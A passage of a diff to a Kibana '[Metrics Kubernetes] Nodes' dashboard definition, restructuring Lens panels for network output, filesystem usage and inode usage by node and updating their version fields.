"store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "87c6048e-20a6-401c-bf42-72ae034ee2fa", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "e87c113a-2feb-4cca-8093-1c4f69fc9122" - ], - "layerId": "bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "4d608d6f-472c-433e-88a0-7794bfd9adb9", - "xAccessor": "d38a2561-f4cd-4374-93d3-52acc2b50f7b" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "d38a2561-f4cd-4374-93d3-52acc2b50f7b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "e87c113a-2feb-4cca-8093-1c4f69fc9122": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Network Outgoing Bytes/s", + "operationType": "counter_rate", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "references": [ + "4b5bd01c-47a8-4f48-ba67-69396e9add37" + ], + "scale": "ratio", + "timeScale": "s" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "87c6048e-20a6-401c-bf42-72ae034ee2fa", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.node" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 13, - "i": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3", - "w": 24, - "x": 0, - "y": 46 + "layers": [ + { + "accessors": [ + "e87c113a-2feb-4cca-8093-1c4f69fc9122" + ], + "layerId": "bcb17062-e9f5-4da8-a132-7bdbffe8a740", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "4d608d6f-472c-433e-88a0-7794bfd9adb9", + "xAccessor": "d38a2561-f4cd-4374-93d3-52acc2b50f7b" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3", - "title": "Network out by node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-98ce32f8-426f-43a8-8af5-81cf2f2e44b9", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Network out by node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5", + "w": 24, + "x": 24, + "y": 46 + }, + "panelIndex": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-98ce32f8-426f-43a8-8af5-81cf2f2e44b9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3b897101-bd76-444d-859e-60916d19dc02", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "98ce32f8-426f-43a8-8af5-81cf2f2e44b9": { + "columnOrder": [ + "2429802b-e45c-4bc0-8d4c-f66541ea3476", + "65f1d82b-207f-4397-9800-a3100415dc4d", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2" + ], + "columns": { + "2429802b-e45c-4bc0-8d4c-f66541ea3476": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "3b897101-bd76-444d-859e-60916d19dc02", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "98ce32f8-426f-43a8-8af5-81cf2f2e44b9": { - "columnOrder": [ - "2429802b-e45c-4bc0-8d4c-f66541ea3476", - "65f1d82b-207f-4397-9800-a3100415dc4d", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2" - ], - "columns": { - "2429802b-e45c-4bc0-8d4c-f66541ea3476": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Filesystem Usage Pct", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "average(kubernetes.node.fs.used.bytes)/max(kubernetes.node.fs.capacity.bytes)", - "isFormulaBroken": false - }, - "references": [ - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2" - ], - "scale": "ratio" - }, - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Filesystem Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.fs.used.bytes" - }, - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Filesystem Usage Pct", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.fs.capacity.bytes" - }, - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Filesystem Usage Pct", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1" - ], - "location": { - "max": 77, - "min": 0 - }, - "name": "divide", - "text": "average(kubernetes.node.fs.used.bytes)/max(kubernetes.node.fs.capacity.bytes)", - "type": "function" - } - }, - "references": [ - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1" - ], - "scale": "ratio" - }, - "65f1d82b-207f-4397-9800-a3100415dc4d": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "3b897101-bd76-444d-859e-60916d19dc02", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Filesystem Usage Pct", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "29523c40-c9bf-4f83-b3d5-53b0ee4d5524" - ], - "layerId": "98ce32f8-426f-43a8-8af5-81cf2f2e44b9", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "2429802b-e45c-4bc0-8d4c-f66541ea3476", - "xAccessor": "65f1d82b-207f-4397-9800-a3100415dc4d" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true + "formula": "average(kubernetes.node.fs.used.bytes)/max(kubernetes.node.fs.capacity.bytes)", + "isFormulaBroken": false + }, + "references": [ + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2" + ], + "scale": "ratio" + }, + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Filesystem Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.fs.used.bytes" + }, + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Filesystem Usage Pct", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.fs.capacity.bytes" + }, + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Filesystem Usage Pct", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1" + ], + "location": { + "max": 77, + "min": 0 + }, + "name": "divide", + "text": "average(kubernetes.node.fs.used.bytes)/max(kubernetes.node.fs.capacity.bytes)", + "type": "function" } + }, + "references": [ + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X0", + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "65f1d82b-207f-4397-9800-a3100415dc4d": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "3b897101-bd76-444d-859e-60916d19dc02", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.node" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 13, - "i": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5", - "w": 24, - "x": 24, - "y": 46 + "layers": [ + { + "accessors": [ + "29523c40-c9bf-4f83-b3d5-53b0ee4d5524" + ], + "layerId": "98ce32f8-426f-43a8-8af5-81cf2f2e44b9", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "2429802b-e45c-4bc0-8d4c-f66541ea3476", + "xAccessor": "65f1d82b-207f-4397-9800-a3100415dc4d" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5", - "title": "Filesystem usage by Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9d53c3bf-cefd-433d-a404-972717d0bb74", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Filesystem usage by Node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "5eef3516-509a-414c-b0ad-f6c8af1647bb", + "w": 24, + "x": 0, + "y": 59 + }, + "panelIndex": "5eef3516-509a-414c-b0ad-f6c8af1647bb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9d53c3bf-cefd-433d-a404-972717d0bb74", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "029a2917-cecd-4656-8c48-2ca1f66fcadd", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "9d53c3bf-cefd-433d-a404-972717d0bb74": { + "columnOrder": [ + "4d4a917d-07fa-4b5b-be50-5d09b7906ff5", + "890b120e-c1de-4501-8e37-336c75255d07", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2" + ], + "columns": { + "4d4a917d-07fa-4b5b-be50-5d09b7906ff5": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "029a2917-cecd-4656-8c48-2ca1f66fcadd", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "9d53c3bf-cefd-433d-a404-972717d0bb74": { - "columnOrder": [ - "4d4a917d-07fa-4b5b-be50-5d09b7906ff5", - "890b120e-c1de-4501-8e37-336c75255d07", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2" - ], - "columns": { - "4d4a917d-07fa-4b5b-be50-5d09b7906ff5": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "890b120e-c1de-4501-8e37-336c75255d07": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "f3b6d48f-9098-43bf-b6f7-4a4713f93860": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Inodes Usage Pct", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "average(kubernetes.node.fs.inodes.used)/max(kubernetes.node.fs.inodes.count)", - "isFormulaBroken": false - }, - "references": [ - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2" - ], - "scale": "ratio" - }, - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Inodes Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.fs.inodes.used" - }, - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Inodes Usage Pct", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.fs.inodes.count" - }, - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Inodes Usage Pct", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1" - ], - "location": { - "max": 76, - "min": 0 - }, - "name": "divide", - "text": "average(kubernetes.node.fs.inodes.used)/max(kubernetes.node.fs.inodes.count)", - "type": "function" - } - }, - "references": [ - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", - "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "029a2917-cecd-4656-8c48-2ca1f66fcadd", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + }, + "890b120e-c1de-4501-8e37-336c75255d07": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "f3b6d48f-9098-43bf-b6f7-4a4713f93860": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Inodes Usage Pct", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - "visualization": { - "layers": [ - { - "accessors": [ - "f3b6d48f-9098-43bf-b6f7-4a4713f93860" - ], - "layerId": "9d53c3bf-cefd-433d-a404-972717d0bb74", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "4d4a917d-07fa-4b5b-be50-5d09b7906ff5", - "xAccessor": "890b120e-c1de-4501-8e37-336c75255d07" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": true - } + "formula": "average(kubernetes.node.fs.inodes.used)/max(kubernetes.node.fs.inodes.count)", + "isFormulaBroken": false + }, + "references": [ + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Inodes Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.fs.inodes.used" + }, + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Inodes Usage Pct", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.fs.inodes.count" + }, + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Inodes Usage Pct", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1" + ], + "location": { + "max": 76, + "min": 0 + }, + "name": "divide", + "text": "average(kubernetes.node.fs.inodes.used)/max(kubernetes.node.fs.inodes.count)", + "type": "function" + } + }, + "references": [ + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X0", + "f3b6d48f-9098-43bf-b6f7-4a4713f93860X1" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "029a2917-cecd-4656-8c48-2ca1f66fcadd", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.node" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 13, - "i": "5eef3516-509a-414c-b0ad-f6c8af1647bb", - "w": 24, - "x": 0, - "y": 59 + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "f3b6d48f-9098-43bf-b6f7-4a4713f93860" + ], + "layerId": "9d53c3bf-cefd-433d-a404-972717d0bb74", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "4d4a917d-07fa-4b5b-be50-5d09b7906ff5", + "xAccessor": "890b120e-c1de-4501-8e37-336c75255d07" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "5eef3516-509a-414c-b0ad-f6c8af1647bb", - "title": "Filesystem Inodes usage by Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Nodes", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-01-11T13:56:20.011Z", - "id": "kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "c6bb8ec0-dae3-4438-ab76-0bff97321124:indexpattern-datasource-layer-4bf1dfdb-7a60-482d-88d4-130d598ac7bb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c6bb8ec0-dae3-4438-ab76-0bff97321124:562d314a-8db1-4d85-9fcd-fe3224749cb2", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2a2da54b-f923-4b1f-b36c-0b1d283405b9:indexpattern-datasource-layer-28060f62-4880-4b1c-aef2-fe42f9df0c64", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2a2da54b-f923-4b1f-b36c-0b1d283405b9:3a819463-89ca-494a-9d6a-9e600dccf098", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f11dcb2d-3850-430c-b365-e925473ffe81:indexpattern-datasource-layer-f04e39cf-1a10-4841-86e3-53c07cb706df", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f11dcb2d-3850-430c-b365-e925473ffe81:53703bad-9449-489b-84bd-35c1c8a8d710", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64187c9b-8038-47a3-b7df-6562d740840f:indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64187c9b-8038-47a3-b7df-6562d740840f:89318796-9c5f-41c0-be0f-5545f0012e08", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b228c756-7cbd-4982-b61b-c6dbb78c1ced:indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b228c756-7cbd-4982-b61b-c6dbb78c1ced:862adc15-64b5-4dd6-a4e9-9bfc8538633d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4:indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "93d7f58a-ee13-4ca2-968a-a6c8bcf249a4:a21b3215-31e2-4ab3-b313-8fc7e77bed39", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3:indexpattern-datasource-layer-bcb17062-e9f5-4da8-a132-7bdbffe8a740", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7c066a0c-0e3d-483d-a4fd-89dd6444d2d3:87c6048e-20a6-401c-bf42-72ae034ee2fa", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5:indexpattern-datasource-layer-98ce32f8-426f-43a8-8af5-81cf2f2e44b9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5c839f9c-a8bc-46e0-bd23-9300c03e6ed5:3b897101-bd76-444d-859e-60916d19dc02", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5eef3516-509a-414c-b0ad-f6c8af1647bb:indexpattern-datasource-layer-9d53c3bf-cefd-433d-a404-972717d0bb74", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5eef3516-509a-414c-b0ad-f6c8af1647bb:029a2917-cecd-4656-8c48-2ca1f66fcadd", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_57552b73-992a-46e6-9f21-9e07ca926a83:optionsListDataView", - "type": "index-pattern" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_6c029002-b266-42ef-af36-fdcd73bfadef:optionsListDataView", - "type": "index-pattern" - } + "title": "Filesystem Inodes usage by Node [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] Nodes", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "c6bb8ec0-dae3-4438-ab76-0bff97321124:indexpattern-datasource-layer-4bf1dfdb-7a60-482d-88d4-130d598ac7bb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c6bb8ec0-dae3-4438-ab76-0bff97321124:562d314a-8db1-4d85-9fcd-fe3224749cb2", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2a2da54b-f923-4b1f-b36c-0b1d283405b9:indexpattern-datasource-layer-28060f62-4880-4b1c-aef2-fe42f9df0c64", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2a2da54b-f923-4b1f-b36c-0b1d283405b9:3a819463-89ca-494a-9d6a-9e600dccf098", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f11dcb2d-3850-430c-b365-e925473ffe81:indexpattern-datasource-layer-f04e39cf-1a10-4841-86e3-53c07cb706df", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f11dcb2d-3850-430c-b365-e925473ffe81:53703bad-9449-489b-84bd-35c1c8a8d710", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64187c9b-8038-47a3-b7df-6562d740840f:indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64187c9b-8038-47a3-b7df-6562d740840f:89318796-9c5f-41c0-be0f-5545f0012e08", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b228c756-7cbd-4982-b61b-c6dbb78c1ced:indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b228c756-7cbd-4982-b61b-c6dbb78c1ced:862adc15-64b5-4dd6-a4e9-9bfc8538633d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 